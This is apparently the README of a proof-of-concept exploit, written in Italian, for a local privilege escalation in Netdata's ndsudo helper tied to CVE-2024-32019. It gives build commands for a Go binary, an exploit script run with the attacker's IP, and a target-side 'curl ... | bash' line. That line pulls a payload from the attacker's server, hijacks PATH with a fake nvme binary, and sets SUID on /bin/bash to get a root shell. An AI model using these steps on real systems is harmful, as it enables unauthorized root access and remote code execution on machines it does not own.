
Netdata ndsudo PoC
Netdata ndsudo PoC
Compila il binario:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Esegui lo script bash:
bash exploit.sh <YOUR IP>
Sulla macchina target, esegui in una directory scrivibile:
curl http://<YOUT IP>:8000/payload.sh | bash
Scaricherà automaticamente il binario nvme, esporterà il PATH, eseguirà ndsudo e aggiungerà SUID a /bin/bash.
Probabilmente dovrai modificare il percorso di ndsudo in exploit.sh
Per eseguire l'escalation dei privilegi, esegui:
/bin/bash -p
L'exploit si basa su https://github.com/AzureADTrent/CVE-2024-32019-POC; quando l'ho testato, ho avuto l'errore:
execve: Exec format error
Ecco perché ho deciso di creare il mio con Go.